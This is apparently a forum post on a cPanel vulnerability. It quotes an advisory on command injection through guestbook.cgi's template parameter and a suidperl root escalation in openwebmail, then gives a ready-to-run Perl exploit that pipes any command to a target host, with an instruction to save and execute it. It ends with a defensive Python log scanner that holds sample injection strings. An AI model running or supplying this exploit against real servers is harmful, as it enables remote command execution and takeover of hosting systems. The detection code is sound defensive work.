Nothing Brand New Here -- More on the CPanel Exploit

If you didn't understand how the exploit that was posted a few days ago worked ... they now have a perl script that will do everything for you (if you want to see how the exploit works).

Just make this into a perl file, and execute.

http://www.securityfocus.com/archive...ment/312882/2/

Code:
#!/usr/bin/perl
#
# ------- start here -------
#
# Bug found by: pokleyzz
#
# Cpanel is a web hosting control panel which allows clients to manage their web accounts through
# a web interface. Most of the applications are written in perl and compiled to binary.
#
# Details
# =======
# There are multiple vulnerabilities in this package, as described below.
# 
# 1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
# 
# There is a classic perl open function vulnerability in the template variable which allows any
# user to read any file or run commands as the valid system user which is assigned to the specific url
# in the apache configuration.
#
# 2) Local privileges escalation (root)
#
# Cpanel comes with the openwebmail package as one of its web-based email readers, which is suid root.
# On a system with suid perl installed perfectly (with suid mode turned on), a local user may
# include their own perl script when running the openwebmail script (oom) through suidperl.
#
# Openwebmail appends to the perl include path (@INC) through the SCRIPT_FILENAME environment variable,
# then includes some files when executed.
#
# /usr/local/cpanel/base/openwebmail/oom line 14
#
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
# push (@INC, $SCRIPT_DIR, ".");
# .
# .
# .
# require "openwebmail-shared.pl";
#
# proof of concept:
# i) Create a file openwebmail-shared.pl containing the perl script you want to execute.
# ii) Set SCRIPT_FILENAME to point to the full path of the openwebmail-shared.pl file you just created.
# iii) exec the oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
#
# -------- cut here --------
#
# coded by cyzek. cyzek@efnet
# thanks for p0ng p0ng@brasnet.org
 
$url = $ARGV[0];
$cmd = $ARGV[1];
if(@ARGV != 2){
print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
print " use %20 for spaces.\n";
print " usage: $0 <host> <cmd>\n";
exit;
}
use IO::Socket::INET;
$rem = IO::Socket::INET->new(
Proto       => "tcp",
PeerAddr    => $url,
PeerPort    => "80");
if ($rem) { 
print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r";
@resp = <$rem>;
}
print "@resp\n\n";
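
For anyone checking whether a server has already been probed, here is a log check for the guestbook.cgi `template` issue described in the advisory above. It is an added example, not part of the original post or of cPanel. It assumes Apache common/combined log format and that legitimate template values are plain relative file names; the function names and the sample log lines are made up for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote
SCRIPT = "/cgi-sys/guestbook.cgi"
# Request line of an Apache common/combined log entry: "METHOD target [PROTO]"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?"')
# Characters Perl's two-argument open() treats as pipe or redirection modes.
MODE_CHARS = re.compile(r"[|<>]")

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded pipe (%257C) is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return why a log line looks like abuse of `template`, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    try:
        parts = urlsplit(m.group("target"))
    except ValueError:  # malformed target, nothing to inspect
        return None
    if not fully_unquote(parts.path).endswith(SCRIPT):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("template", []):
        value = fully_unquote(raw)
        if MODE_CHARS.search(value):
            return "open-mode-char"
        # Assumption: legitimate templates are plain relative file names.
        if value.startswith("/") or ".." in value:
            return "path-escape"
    return None

SAMPLE_LOG = [  # constructed lines (documentation addresses), not real traffic
    '192.0.2.10 - - [01/Jan/2004:10:00:00 +0000] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=default.html HTTP/1.0" 200 512',
    '192.0.2.77 - - [01/Jan/2004:10:00:05 +0000] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|id| HTTP/1.0 " 200 87',
    '192.0.2.77 - - [01/Jan/2004:10:00:09 +0000] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=%257Cid%257C HTTP/1.0" 200 87',
    '192.0.2.78 - - [01/Jan/2004:10:01:00 +0000] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=../../../etc/hosts HTTP/1.0" 200 900',
    '192.0.2.11 - - [01/Jan/2004:10:02:00 +0000] "GET /index.html?template=|x| HTTP/1.0" 200 100',
]

def scan(lines):
    checked = ((i, check_line(line)) for i, line in enumerate(lines))
    return [(i, reason) for i, reason in checked if reason]
```

`scan()` takes any iterable of log lines, so it can be pointed at an open access log file; a hit only shows the request was made, not that it succeeded.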

 

 

 

 
